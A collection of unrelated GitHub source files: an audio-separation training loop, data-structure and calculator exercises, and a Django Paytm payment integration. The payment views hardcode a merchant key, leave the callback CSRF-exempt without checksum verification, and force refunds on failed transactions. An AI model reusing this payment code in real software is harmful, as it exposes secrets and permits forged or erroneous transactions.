{}\n\n if (\n len(args.train_loss_func) == 1\n ): # train_loss_function only uses pit_si_sdr (or pit_other) loss\n loss_input[args.train_loss_func[0]] = (estimates, target)\n\n loss_dict = self.cal_loss(args, loss_input)\n loss = sum([value.mean() for key, value in loss_dict.items()])\n\n else: # train_loss_function uses other losses\n loss = []\n for train_loss_idx, single_train_loss_func in enumerate(\n args.train_loss_func\n ):\n # first single_train_loss_func should be 'pit_si_sdr or pit_sd_sdr' or 'pit_snr' or 'pit_multi_spectral_l1'\n if single_train_loss_func == (\n \"pit_si_sdr\"\n or \"pit_sd_sdr\"\n or \"pit_snr\"\n or \"pit_multi_spectral_l1\"\n ):\n loss_pit, estimates = self.criterion[\n single_train_loss_func\n ].forward(estimates, target, return_est=True)\n loss.append(loss_pit.mean())\n else:\n if (\n args.mixture_consistency == \"sfsrnet\"\n and len(args.train_loss_func) == 2\n ):\n estimates = self.model.module.forward_sr(\n mixture, estimates\n ) # for example, when using --train_loss_func pit_si_sdr si_sdr\n elif (\n args.mixture_consistency == \"sfsrnet\"\n and len(args.train_loss_func) >= 3\n ): # --train_loss_func pit_snr multi_spectral_l1 snr multi_spectral_l1\n if train_loss_idx == 2:\n estimates = self.model.module.forward_sr(\n mixture, estimates\n ) # for example\n else:\n pass\n loss_else = self.criterion[single_train_loss_func](\n estimates, target\n )\n loss.append(loss_else.mean())\n loss = sum(loss)\n ############################################################\n\n #################### 5. Back propagation ####################\n if args.mixed_precision:\n self.scaler.scale(loss).backward()\n if args.gradient_clip:\n self.scaler.unscale_(self.optimizer)\n nn.utils.clip_grad_norm_(\n self.model.parameters(), max_norm=args.gradient_clip\n )\n self.scaler.step(self.optimizer)\n self.scaler.update()\n else:\n loss.backward()\n if args.gradient_clip:\n nn.utils.clip_grad_norm_(\n self.model.parameters(), max_norm=args.gradient_clip\n )\n self.optimizer.step()\n\n losses.update(loss.item(), clean.size(0))\n\n loss_logger[\"epoch-wise-train/train loss\"] = loss.item()\n\n self.model.zero_grad()\n\n if args.ema:\n self.model_ema.update()\n ############################################################\n\n # ###################### 6. Plot ######################\n if i % 30 == 0:\n # loss print for multiple loss function\n multiple_score = torch.Tensor(\n [value for key, value in loss_logger.items()]\n ).to(args.gpu)\n gathered_score_list = [\n torch.ones_like(multiple_score)\n for _ in range(dist.get_world_size())\n ]\n dist.all_gather(gathered_score_list, multiple_score)\n gathered_score = torch.mean(\n torch.stack(gathered_score_list, dim=0), dim=0\n )\n if args.gpu == 0:\n print(f\"Epoch {epoch}, step {i} / {len(self.train_loader)}\")\n temp_loss_logger = {}\n for index, (key, value) in enumerate(loss_logger.items()):\n temp_key = key.replace(\"epoch-wise-train/\", \"iter-wise/\")\n temp_loss_logger[temp_key] = round(\n gathered_score[index].item(), 6\n )\n print(f\"{key} : {round(gathered_score[index].item(), 6)}\")\n\n single_score = torch.Tensor([losses.avg]).to(args.gpu)\n loss_logger[\"epoch-wise-train/train loss\"] = single_score\n\n if args.use_wandb and args.gpu == 0:\n loss_logger[\"epoch-wise-train/epoch\"] = epoch\n wandb.log(loss_logger)\n\n gathered_score_list = [\n torch.ones_like(single_score) for _ in range(dist.get_world_size())\n ]\n dist.all_gather(gathered_score_list, single_score)\n gathered_score = torch.mean(torch.cat(gathered_score_list)).item()\n if args.gpu == 0:\n self.train_losses.append(gathered_score)\n\n def multi_validate(self, args, epoch):\n if args.gpu == 0:\n print(f\"Epoch {epoch} Validation session!\")\n\n losses = utils.AverageMeter()\n\n loss_logger = {}\n\n self.model.eval()\n with torch.no_grad():\n valid_loss_accumulated = 0\n for valid_loader_idx, valid_loader in enumerate(self.valid_loader):\n if args.dataset == \"multi_singing_librispeech\":\n valid_loader_category = args.valid_root_orpit[valid_loader_idx][3]\n else:\n valid_loader_category = args.valid_root[valid_loader_idx][3]\n for i, values in enumerate(valid_loader, start=1):\n\n mixture, clean = values\n\n mixture = mixture.cuda(args.gpu, non_blocking=True)\n clean = clean.cuda(args.gpu, non_blocking=True)\n\n target = clean\n\n loss_input = {}\n\n if args.mixed_precision:\n with torch.cuda.amp.autocast():\n if args.ema:\n estimates = self.model_ema(mixture)\n else:\n estimates = self.model(mixture)\n else:\n if args.ema:\n estimates = self.model_ema(mixture)\n else:\n estimates = self.model(mixture)\n\n if (\n args.architecture == \"conv_tasnet_stft\"\n or args.architecture == \"conv_tasnet_learnable_basis\"\n ):\n if len(args.valid_loss_func) == 1:\n loss_input[args.valid_loss_func[0]] = (estimates, target)\n\n loss_dict = self.cal_loss(\n args, loss_input\n ) # 각 loss 에 대한 계산. loss 를 dict 로 저장\n loss = sum(\n [value.mean() for key, value in loss_dict.items()]\n )\n else:\n loss = []\n for single_valid_loss_func in args.valid_loss_func:\n if single_valid_loss_func == (\n \"pit_si_sdr\" or \"pit_sd_sdr\"\n ):\n loss_pit, estimates = self.criterion[\n single_valid_loss_func\n ].forward(estimates, target, return_est=True)\n loss.append(loss_pit)\n else:\n loss_else = self.criterion[single_valid_loss_func](\n estimates, target\n )\n loss.append(loss_else)\n loss = sum(loss)\n losses.update(loss.item(), clean.size(0))\n else:\n if len(args.valid_loss_func) == 1:\n\n loss_input[args.valid_loss_func[0]] = (estimates, target)\n\n loss_dict = self.cal_loss(\n args, loss_input\n ) # 각 loss 에 대한 계산. loss 를 dict 로 저장\n loss = sum([value for key, value in loss_dict.items()])\n else:\n loss = []\n for single_valid_loss_func in args.valid_loss_func:\n if single_valid_loss_func == (\n \"pit_si_sdr\" or \"pit_sd_sdr\"\n ):\n loss_pit, estimates = self.criterion[\n single_valid_loss_func\n ].forward(estimates, target, return_est=True)\n loss.append(loss_pit)\n else:\n loss_else = self.criterion[single_valid_loss_func](\n estimates, target\n )\n loss.append(loss_else)\n loss = sum(loss)\n losses.update(loss.item(), clean.size(0))\n\n single_score = torch.Tensor([losses.avg]).to(args.gpu)\n gathered_score_list = [\n torch.ones_like(single_score) for _ in range(dist.get_world_size())\n ]\n dist.all_gather(gathered_score_list, single_score)\n gathered_score = torch.mean(torch.cat(gathered_score_list)).item()\n\n loss_logger[\n f\"epoch-wise-valid/{valid_loader_category} valid loss\"\n ] = gathered_score\n\n valid_loss_accumulated = valid_loss_accumulated + gathered_score\n\n if args.use_wandb and args.gpu == 0:\n loss_logger[\"epoch-wise-valid/epoch\"] = epoch\n wandb.log(loss_logger)\n\n valid_loss_accumulated = valid_loss_accumulated / len(self.valid_loader)\n\n if args.lr_scheduler == \"step_lr\":\n self.scheduler.step(valid_loss_accumulated)\n elif args.lr_scheduler == \"cos_warmup\":\n self.scheduler.step(epoch)\n else:\n self.scheduler.step(valid_loss_accumulated)\n\n if args.gpu == 0:\n self.valid_losses.append(valid_loss_accumulated)\n\n self.stop = self.es.step(valid_loss_accumulated)\n\n print(\n f\"Epoch {epoch}, validation loss : {round(valid_loss_accumulated, 6)}\"\n )\n\n plt.plot(self.train_losses, label=\"train loss\")\n plt.plot(self.valid_losses, label=\"valid loss\")\n plt.legend(loc=\"upper right\")\n plt.savefig(f\"{args.output}/loss_graph_{args.target}.png\")\n plt.close()\n\n save_states = {\n \"epoch\": epoch,\n \"state_dict\": self.model.module.state_dict()\n if not args.ema\n else self.model_ema.state_dict(),\n \"best_loss\": self.es.best,\n \"optimizer\": self.optimizer.state_dict(),\n \"scheduler\": self.scheduler.state_dict(),\n }\n\n utils.save_checkpoint(\n save_states,\n state_dict_only=valid_loss_accumulated == self.es.best,\n path=args.output,\n target=args.target,\n )\n\n self.train_times.append(time.time() - self.end)\n\n # 일단 pass\n if valid_loss_accumulated == self.es.best:\n self.best_epoch = epoch\n\n # save params\n params = {\n \"epochs_trained\": epoch,\n \"args\": vars(args),\n \"best_loss\": self.es.best,\n \"best_epoch\": self.best_epoch,\n \"train_loss_history\": self.train_losses,\n \"valid_loss_history\": self.valid_losses,\n \"train_time_history\": self.train_times,\n \"num_bad_epochs\": self.es.num_bad_epochs,\n }\n\n with open(f\"{args.output}/{args.target}.json\", \"w\") as outfile:\n outfile.write(json.dumps(params, indent=4, sort_keys=True))\n\n self.train_times.append(time.time() - self.end)\n print(\n f\"Epoch {epoch} train completed. Took {round(self.train_times[-1], 3)} seconds\"\n )\n\n def resume(self, args):\n print(f\"Resume checkpoint from: {args.resume}:\")\n loc = f\"cuda:{args.gpu}\"\n checkpoint_path = f\"{args.resume}/{args.target}\"\n with open(f\"{checkpoint_path}.json\", \"r\") as stream:\n results = json.load(stream)\n checkpoint = torch.load(f\"{checkpoint_path}.chkpnt\", map_location=loc)\n if args.start_from_best:\n del checkpoint[\"state_dict\"]\n checkpoint[\"state_dict\"] = torch.load(\n f\"{checkpoint_path}.pth\", map_location=loc\n )\n print(\"start from best weight\")\n if args.ema:\n if args.mixture_consistency == \"sfsrnet\":\n model_dict = self.model_ema.state_dict()\n # 1. filter out unnecessary keys\n checkpoint[\"state_dict\"] = {\n k: v for k, v in checkpoint[\"state_dict\"].items() if k in model_dict\n }\n # 2. overwrite entries in the existing state dict\n model_dict.update(checkpoint[\"state_dict\"])\n # 3. load the new state dict\n self.model_ema.load_state_dict(checkpoint[\"state_dict\"], strict=False)\n else:\n self.model_ema.load_state_dict(checkpoint[\"state_dict\"])\n self.optimizer.load_state_dict(checkpoint[\"optimizer\"])\n else:\n if args.load_ema_online_model:\n print(\"load ema online model!!\")\n model_dict = self.model.state_dict()\n # 1. filter out unnecessary keys\n checkpoint[\"state_dict\"] = {\n k.replace(\"online_model.module.\", \"\"): v\n for k, v in checkpoint[\"state_dict\"].items()\n if k.replace(\"online_model.module.\", \"\") in model_dict\n }\n # 2. overwrite entries in the existing state dict\n model_dict.update(checkpoint[\"state_dict\"])\n # 3. load the new state dict\n self.model.load_state_dict(checkpoint[\"state_dict\"])\n else:\n self.model.load_state_dict(checkpoint[\"state_dict\"])\n\n self.optimizer.load_state_dict(checkpoint[\"optimizer\"])\n if (\n args.continual_train\n ): # we want to use pre-trained model but not want to use lr_scheduler history.\n for param_group in self.optimizer.param_groups:\n param_group[\"lr\"] = args.lr\n else:\n self.scheduler.load_state_dict(checkpoint[\"scheduler\"])\n self.es.best = results[\"best_loss\"]\n self.es.num_bad_epochs = results[\"num_bad_epochs\"]\n\n self.start_epoch = results[\"epochs_trained\"] + 1\n self.train_losses = results[\"train_loss_history\"]\n self.valid_losses = results[\"valid_loss_history\"]\n self.train_times = results[\"train_time_history\"]\n self.best_epoch = results[\"best_epoch\"]\n\n if args.rank % args.ngpus_per_node == 0:\n print(\n f\"=> loaded checkpoint {checkpoint_path} (epoch {results['epochs_trained']})\"\n )\n\n def cal_loss(self, args, loss_input):\n loss_dict = {}\n for key, value in loss_input.items():\n loss_dict[key] = self.criterion[key](*value)\n\n return loss_dict\n","repo_name":"jeonchangbin49/MedleyVox","sub_path":"svs/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":31099,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"52"} +{"seq_id":"38686330523","text":"class node:\n def __init__(self,item):\n self.item=item\n self.next=None\n \nclass linkedlist:\n def __init__(self):\n self.head=None\n \n def insertatbegining(self,new_item):\n new_node=node(new_item)\n new_node.next=self.head\n self.head=new_node\n \n def insertatend(self,new_item):\n new_node=node(new_item)\n if self.head is None:\n self.head=new_node\n return\n last=self.head\n while(last.next is not None):\n last=last.next\n last.next=new_node\n \n \n def insertatposition(self,prev_node,new_item):\n if prev_node is None:\n print(\"the given previos node mustin linked list\")\n return\n new_node=node(new_item)\n new_node.next=prev_node.next\n prev_node.next=new_node\n \n \n def deletenode(self,position):\n if self.head is None:\n return\n temp=self.head\n if position == 0:\n self.head=temp.next\n temp=None\n return\n for i in range(position-1):\n temp=temp.next\n if temp is None:\n break\n if temp is None:\n return\n if temp.next is None:\n return\n next=temp.next.next\n temp.next=None\n temp.next=next\n \n \n def search(self,key):\n current=self.head\n while current is not None:\n if current.item==key:\n return True\n current=current.next\n return False\n \n \n def sortlinkedlist(self,head):\n current=head\n index=node(None)\n if head is None:\n return\n else:\n while current is not None:\n index=current.next\n while index is not None:\n if current.item>index.item:\n current.item,index.item=index.item,current.item\n index=index.next\n current=current.next\n \n \n def printlist(self):\n temp=self.head\n while(temp):\n print(str(temp.item),end=\" \")\n temp=temp.next\n \nif __name__== '__main__':\n linked_list=linkedlist()\n linked_list.head=node(1)\n second=node(2)\n third=node(3)\n linked_list.head.next=second\n second.next=third\n linked_list.printlist()\n print()\n linked_list.insertatbegining(4)\n linked_list.printlist()\n print()\n linked_list.insertatend(5)\n linked_list.printlist()\n print()\n linked_list.insertatposition(linked_list.head.next,6)\n linked_list.printlist()\n print()\n linked_list.deletenode(3)\n linked_list.printlist()\n print()\n item_to_find=3\n if linked_list.search(item_to_find):\n print(str(item_to_find)+\" is found\")\n else:\n print(str(item_to_find)+\" is not found\")\n print()\n linked_list.sortlinkedlist(linked_list.head)\n print(\"sorted list:\")\n linked_list.printlist()\n","repo_name":"Sirivarshini5B5/CP-journey","sub_path":"Data structures/single_linked _list.py","file_name":"single_linked _list.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22132898873","text":"import tkinter as tk\nfrom ttkbootstrap.constants import *\nimport ttkbootstrap as tb\n\ndef main(): \n \n sum_label = tb.Label(text=\"Sum\", font=('Helvetica', 20), bootstyle=\"default\")\n vat_label = tb.Label(text=\"VAT in %\", font=(\"Helvetica\", 20), bootstyle=\"default\")\n \n sum_label.grid(row=3, column=0, pady=55)\n vat_label.grid(row=4, column=0, pady=0)\n \n sum_entry.grid(row=3, column=1, sticky=\"ew\")\n vat_entry.grid(row=4, column=1, sticky=\"ew\")\n \n top_label = tb.Label(text=\"Calculate VAT\", font=(\"Helvetica\", 20), bootstyle=\"warning\")\n left_label = tb.Label(text=\"Inclusive/Exclusive\", font=(\"Helvetica\", 20), bootstyle=\"warning\")\n \n top_label.grid(row=1, column=1, pady=25)\n left_label.grid(row=2, column=1)\n \n the_sum_includes = tb.Label(text=\"Action:\", font=(\"Helvetica\", 20), bootstyle=\"default\")\n \n include_vat_style = tb.Style()\n include_vat_style.configure(\"success.TCheckbutton\", font=(\"Helvetica\", 16))\n includes_vat = tb.Checkbutton(bootstyle=\"success, round-toggle\", \n text=\"Exclude VAT\", \n variable=var_include_vat, \n onvalue=1, \n offvalue=0,\n style=\"success.TCheckbutton\")\n \n \n vat_not_included_style = tb.Style()\n vat_not_included_style.configure(\"success.TCheckbutton\", font=(\"Helvetica\", 16))\n vat_not_included = tb.Checkbutton(bootstyle=\"succes, round-toggle\", \n text='Add VAT',\n variable=var_not_include_vat,\n onvalue=1,\n offvalue=0,\n style=\"success.TCheckbutton\"\n )\n \n #Position on the work screen\n the_sum_includes.grid(row=5, column=0, pady=50)\n includes_vat.grid(row=5, column=1)\n vat_not_included.grid(row=5, column=2)\n \n \n #Style buttons\n calculate_style = tb.Style()\n calculate_style.configure('info.TButton', font=('Helvetica', 18))\n \n clear_style = tb.Style()\n clear_style.configure(\"danger.TButton\", font=(\"Helvetica\", 18))\n \n \n calculate_button = tb.Button(text=\"Calculate\", bootstyle=\"info\", style=\"info.TButton\", command=check_operation)\n other_action = tb.Label(text=\"OR\", font=(\"Helvetica\", 20), bootstyle=\"default\")\n clear_button = tb.Button(text=\"Clear\", bootstyle=\"danger\", style=\"danger.TButton\", command=clear_entrys)\n \n calculate_button.grid(row=6, column=0)\n other_action.grid(row=6, column=1)\n clear_button.grid(row=6, column=2)\n \n window.mainloop()\n\ndef clear_entrys():\n sum_entry.delete(0, 'end')\n vat_entry.delete(0, 'end')\n\ndef no_str_input():\n clear_entrys()\n \n warn_input = tb.Label(text=\"Use only numbers!\", font=(\"Helvetica\", 18), bootstyle=\"danger\")\n warn_input.grid(row=7, column=1, pady=50)\n \ndef calculate_vat_included(s_value, v_value):\n s_value = int(s_value)\n v_value = int(v_value)\n \n sum_without_vat = round((s_value / (v_value + 100) * 100), 2)\n vat = round(s_value - sum_without_vat, 2)\n \n return [sum_without_vat, vat]\n \ndef calculate_vat_excluded(s_value, v_value):\n s_value = int(s_value)\n v_value = int(v_value)\n \n sum_with_vat = round((s_value / 100) * (v_value + 100), 2 )\n vat = round(sum_with_vat - s_value, 2)\n \n return [sum_with_vat, vat]\n\ndef check_operation():\n \n try:\n sum_entry_value = int(sum_entry.get())\n vat_entry_value = int(vat_entry.get())\n except: \n ValueError(no_str_input())\n \n \n if var_include_vat.get() == 1:\n exclude_vat = calculate_vat_included(sum_entry_value, vat_entry_value)\n display_result(exclude_vat, \"exclude\")\n elif var_not_include_vat.get() == 1:\n add_vat = calculate_vat_excluded(sum_entry_value, vat_entry_value)\n display_result(add_vat, \"add\")\n\n else:\n warn_text = tb.Label(text=\"Please select VAT option\", bootstyle=\"warning\", font=(\"Helvetica\", 15)) \n warn_text.grid(row=7, column=1)\n\ndef display_result(result, action):\n \n amount = tb.Label(text=\"Amount\", font=(\"Helvetica\", 18), bootstyle=\"default\")\n net_amount = tb.Label(text=\"Net Amount\", font=(\"Helvetica\", 18), bootstyle=\"default\")\n gross_amount = tb.Label(text=\"Gross Amount\", font=(\"Helvetica\", 18), bootstyle=\"default\")\n vat_added = tb.Label(text=\"VAT Added\", font=(\"Helvetica\", 18), bootstyle=\"default\")\n vat_excluded = tb.Label(text=\"VAT Excluded\", font=(\"Helvetica\", 18), bootstyle=\"default\")\n \n if action == \"exclude\":\n amount.grid(row=7, column=0, pady=50)\n vat_excluded.grid(row=7, column=1, pady=50)\n net_amount.grid(row=7, column=2, pady=50)\n show_result(result) \n \n elif action == \"add\":\n amount.grid(row=7, column=0, pady=50)\n vat_added.grid(row=7, column=1, pady=50)\n gross_amount.grid(row=7, column=2, pady=50)\n show_result(result)\n\ndef show_result(r):\n initial_value = tb.Label(text=sum_entry.get(), font=(\"Helvetica\", 18), bootstyle=\"warning\")\n vat_result = tb.Label(text=str(r[1]), font=(\"Helvetica\", 18), bootstyle=\"warning\")\n value_result = tb.Label(text=str(r[0]), font=(\"Helvetica\", 18), bootstyle=\"warning\")\n \n initial_value.grid(row=8, column=0, pady=50)\n vat_result.grid(row=8, column=1, pady=50)\n value_result.grid(row=8, column=2, pady=50)\n \nif __name__ == \"__main__\":\n \n window = tb.Window(themename=\"darkly\")\n window.title(\"VAT Calculator\")\n window.geometry(\"600x800\")\n\n window.grid_columnconfigure((0,2), weight=1)\n\n # All entries\n sum_entry = tb.Entry()\n vat_entry = tb.Entry()\n\n #Style checkbuttons\n var_include_vat = tb.IntVar()\n var_not_include_vat = tb.IntVar()\n \n main()\n ","repo_name":"Acrofil/tkinter-vat-calculator","sub_path":"project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":5930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42282134230","text":"from django.shortcuts import render,redirect\nfrom Document.models import document\nfrom order_payload.models import order_id\nfrom order_success.models import order_success\nfrom order_failure.models import order_failure\nfrom order_refund.models import order_refund\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .checksum import *\nimport requests\nimport base64\nimport json\nimport cgi\nfrom os import environ\n\ndef home_page(request):\n context = {}\n #code for downloading Integration Docs File from Template\n try:\n doc = document.objects.get(name=\"Integration Docs\")\n context = {'file':doc}\n except:\n pass\n #order-paylod variables which are mandatory\n MERCHANT_KEY = 'jKc6NjVk0T1eZ0Bg'\n data_dict = {\n\n 'MID' :'KLUIOi74399454829212', #use your test or original MID from paytm buisness account\n 'ORDER_ID' : str(order_id.objects.get(name='ORDER_ID').id),\n 'CUST_ID' : 'Customer_ID', #use different ID for different customers\n 'TXN_AMOUNT' : '1.00', #change value accordingly\n 'CHANNEL_ID' : 'WEB',\n 'WEBSITE' : 'WEBSTAGING',\n 'INDUSTRY_TYPE_ID' : 'Retail',\n 'CALLBACK_URL' : 'http://127.0.0.1:8000/response/',#this for staging_purpose use your own response url\n\n }\n if request.method=='POST':\n data_dict['CHECKSUMHASH'] = generate_checksum(data_dict,MERCHANT_KEY)\n param_dict = data_dict\n paytmURL = \"https://securegw-stage.paytm.in/theia/processTransaction\"\n context['paytm_code_head']=\"

Merchant Check Out Page


\"\n context['paytm_code']=''\n for key in param_dict:\n context['paytm_code']+= \"\"\n context['paytm_code']+=\"'\n context['paytm_code']+='
'\n print('Submitted Data')\n print(data_dict)\n request.session['CHECKSUMHASH'] = data_dict['CHECKSUMHASH']\n\n\n return render(request,\"index.html\",context)\n\n\n@csrf_exempt\ndef response_page(request):\n\n context={}\n MERCHANT_KEY = 'jKc6NjVk0T1eZ0Bg'\n\n data_dict = {\n\n 'MID' :'KLUIOi74399454829212', #use your test or original MID from paytm buisness account\n 'ORDER_ID' : str(order_id.objects.get(name='ORDER_ID').id),\n }\n\n data_dict['CHECKSUMHASH'] = generate_checksum(data_dict,MERCHANT_KEY)\n temp_value = order_id.objects.filter(name=\"ORDER_ID\")\n temp_value.update(id = int(order_id.objects.get(name=\"ORDER_ID\").id) + 1)\n response = requests.get('https://securegw-stage.paytm.in/merchant-status/getTxnStatus?'+'JsonData='+str(data_dict))\n\n try:\n respons_dict = response.json()\n except:\n return render(request,\"unsuccess.html\",context)\n print('\\n')\n print('Recieved from Paytm:')\n print(respons_dict)\n\n if 'GATEWAYNAME' in respons_dict:\n \tif respons_dict['GATEWAYNAME'] == 'WALLET':\n \t\trespons_dict['BANKNAME'] = 'null';\n\n #use a checksum verifying function if needed\n\n if respons_dict['RESPCODE'] == '01':\n context = {\n 'ORDER_ID':respons_dict['ORDERID'],\n 'TXN_AMOUNT':respons_dict['TXNAMOUNT']\n }\n order_success.objects.create(\n order_id = respons_dict['ORDERID'] ,\n txn_id = respons_dict['TXNID'] ,\n txn_amount = respons_dict['TXNAMOUNT'] ,\n txn_date = respons_dict['TXNDATE'] ,\n currency = request.POST['CURRENCY'] ,\n status = respons_dict['STATUS'] ,\n resp_msg = respons_dict['RESPMSG'] ,\n payment_mode = respons_dict['PAYMENTMODE'] ,\n gateway_name = respons_dict['GATEWAYNAME'] ,\n bank_txn_id = respons_dict['BANKTXNID'] ,\n bank_name = respons_dict['BANKNAME']\n )\n if float(respons_dict['REFUNDAMT'])!=0.0:\n order_refund.objects.create(\n order_id = respons_dict['ORDERID'] ,\n txn_id = respons_dict['TXNID'] ,\n txn_amount = respons_dict['TXNAMOUNT'] ,\n txn_date = respons_dict['TXNDATE'] ,\n currency = request.POST['CURRENCY'] ,\n status = respons_dict['STATUS'] ,\n resp_msg = respons_dict['RESPMSG'] ,\n payment_mode = respons_dict['PAYMENTMODE'] ,\n gateway_name = respons_dict['GATEWAYNAME'] ,\n bank_txn_id = respons_dict['BANKTXNID'] ,\n bank_name = respons_dict['BANKNAME'],\n refund_amount = respons_dict['REFUNDAMT']\n )\n refund_dict = {\n\n 'MID' : 'KLUIOi74399454829212',\n 'REFID' : str(order_id.objects.get(name='REF_ID')),\n 'TXNID' : respons_dict['TXNID'],\n 'ORDERID' : respons_dict['ORDERID'],\n 'REFUNDAMOUNT': respons_dict['REFUNDAMT'],\n 'TXNTYPE' : 'REFUND',\n\n }\n refund_dict['CHECKSUM'] = generate_refund_checksum(refund_dict, MERCHANT_KEY, salt=None)\n print('\\nchecksum genrated')\n refund_response = requests.get(\n \"https://securegw-stage.paytm.in/refund/HANDLER_INTERNAL/REFUND?\" +\n \"JsonData=\"+\n str(refund_dict)\n )\n refund_response_dict = refund_response.json()\n print(refund_response_dict)\n ref_id_var = order_id.objects.filter(name='REF_ID')\n ref_id_var.update(id = int(order_id.objects.get(name='REF_ID').id) + 1)\n\n return render(request,\"success.html\",context)\n\n else:\n respons_dict['REFUNDAMT']='1.0'\n if float(respons_dict['REFUNDAMT'])!=0.0:\n print(\"\\nEntered Refund App\")\n order_refund.objects.create(\n order_id = respons_dict['ORDERID'] ,\n txn_id = respons_dict['TXNID'] ,\n txn_amount = respons_dict['TXNAMOUNT'] ,\n txn_date = respons_dict['TXNDATE'] ,\n currency = request.POST['CURRENCY'] ,\n status = respons_dict['STATUS'] ,\n resp_msg = respons_dict['RESPMSG'] ,\n payment_mode = respons_dict['PAYMENTMODE'] ,\n gateway_name = respons_dict['GATEWAYNAME'] ,\n bank_txn_id = respons_dict['BANKTXNID'] ,\n bank_name = respons_dict['BANKNAME'],\n refund_amount =respons_dict['REFUNDAMT']\n )\n refund_dict = {\n\n 'MID' : 'KLUIOi74399454829212',\n 'REFID' : str(order_id.objects.get(name='REF_ID').id),\n 'TXNID' : respons_dict['TXNID'],\n 'ORDERID' : respons_dict['ORDERID'],\n 'REFUNDAMOUNT': respons_dict['REFUNDAMT'],\n 'TXNTYPE' : 'REFUND',\n\n }\n refund_dict['CHECKSUM'] = generate_refund_checksum(refund_dict, MERCHANT_KEY, salt=None)\n refund_response = requests.get(\n \"https://securegw-stage.paytm.in/refund/HANDLER_INTERNAL/REFUND?\" +\n \"JsonData=\"+\n str(refund_dict)\n )\n refund_response_dict = refund_response.json()\n print(refund_response_dict)\n ref_id_var = order_id.objects.filter(name='REF_ID')\n ref_id_var.update(id = int(order_id.objects.get(name='REF_ID').id) + 1)\n\n try:\n order_failure.objects.create(\n\n order_id = respons_dict['ORDERID'] ,\n txn_id = respons_dict['TXNID'] ,\n txn_amount = respons_dict['TXNAMOUNT'] ,\n txn_date = respons_dict['TXNDATE'] ,\n currency = request.POST['CURRENCY'] ,\n status = respons_dict['STATUS'] ,\n resp_msg = respons_dict['RESPMSG'] ,\n payment_mode = respons_dict['PAYMENTMODE'] ,\n gateway_name = respons_dict['GATEWAYNAME'] ,\n bank_txn_id = respons_dict['BANKTXNID'] ,\n bank_name = respons_dict['BANKNAME']\n )\n\n except:\n order_failure.objects.create(\n\n order_id = respons_dict['ORDERID'] ,\n txn_amount = respons_dict['TXNAMOUNT'] ,\n txn_date = respons_dict['TXNDATE'] ,\n currency = request.POST['CURRENCY'] ,\n status = respons_dict['STATUS'] ,\n resp_msg = respons_dict['RESPMSG'] ,\n gateway_name = respons_dict['GATEWAYNAME'] ,\n bank_txn_id = respons_dict['BANKTXNID'] ,\n bank_name = respons_dict['BANKNAME']\n )\n print(respons_dict['\\nRESPMSG'])\n\n return render(request,\"unsuccess.html\",context)\n\n\n return render(request,\"success.html\",context)\n","repo_name":"ajaydevofficial/payment-gateway","sub_path":"processor/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37033578214","text":"fact_vals = {}\n\ndef fact(n):\n if n in fact_vals.keys():\n return fact_vals[n]\n else:\n if n == 0:\n fact_vals[n] = 1\n else:\n fact_vals[n] = n * fact(n - 1)\n return fact_vals[n]\n\ndef choose(n, r):\n return int(fact(n) / (fact(r) * fact(n - r)))\n\nimport time\nstart_time = time.time()\n\nsum = 0\nfor n in range(1, 101):\n for r in range(0, n + 1):\n if choose(n, r) > 1000000:\n sum += 1\n\nprint(int((time.time() - start_time) * 1000), 'milliseconds')\nprint(sum)\n","repo_name":"nicholasiasso/Euler","sub_path":"completed/combo selections.py","file_name":"combo selections.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41263460820","text":"from django.shortcuts import render, redirect\nfrom core.form import HeroForm\nimport random\n\n\n# Create your views here.\ndef home(request):\n return render(request, 'core/home.html')\n\n\ndef create_hero(request):\n if request.method == 'POST':\n form = HeroForm(request.POST)\n if form.is_valid():\n hero = form.save(commit=False)\n hero.atk = random.randint(50, 200)\n hero.save()\n\n return redirect('home')\n else:\n form = HeroForm()\n return render(request, 'core/create_hero.html', {'form': form})\n","repo_name":"JungeunK-9999/yongsaExample","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13877490704","text":"from rest_framework import serializers\nfrom . import models\n\n\nclass RoleSerializer(serializers.ModelSerializer):\n class Meta:\n model = models.Role\n fields = '__all__'\n\n\nclass ClientSerializer(serializers.ModelSerializer):\n class Meta:\n model = models.Client\n fields = (\n 'id', 'name', 'email'\n )\n\n\nclass CountersignSerializer(serializers.ModelSerializer):\n user = serializers.PrimaryKeyRelatedField(\n queryset=models.MyUser.objects.all(),\n help_text='user id',\n )\n contract = serializers.PrimaryKeyRelatedField(\n queryset=models.Contract.objects.all(),\n help_text='contract id',\n )\n\n class Meta:\n model = models.Countersign\n fields = (\n 'id', 'user', 'contract', 'message', 'is_confirmed',\n )\n\n\nclass ReivewSerializer(serializers.ModelSerializer):\n user = serializers.PrimaryKeyRelatedField(\n queryset=models.MyUser.objects.all(),\n help_text='user id',\n )\n contract = serializers.PrimaryKeyRelatedField(\n queryset=models.Contract.objects.all(),\n help_text='contract id',\n )\n\n class Meta:\n model = models.Review\n fields = (\n 'id', 'user', 'contract', 'message', 'is_confirmed',\n )\n\n\nclass SignSerializer(serializers.ModelSerializer):\n user = serializers.PrimaryKeyRelatedField(\n queryset=models.MyUser.objects.all(),\n help_text='user id',\n )\n contract = serializers.PrimaryKeyRelatedField(\n queryset=models.Contract.objects.all(),\n help_text='contract id',\n )\n\n class Meta:\n model = models.Sign\n fields = (\n 'id', 'user', 'contract', 'message', 'is_confirmed',\n )\n\n\nclass ContractSerializer(serializers.ModelSerializer):\n # author = serializers.SlugRelatedField(\n # slug_field='username',\n # queryset=models.MyUser.objects.all()\n # )\n author = serializers.PrimaryKeyRelatedField(\n queryset=models.MyUser.objects.all(),\n help_text='user id of the author',\n )\n countersigns = CountersignSerializer(many=True, read_only=True)\n reviews = ReivewSerializer(many=True, 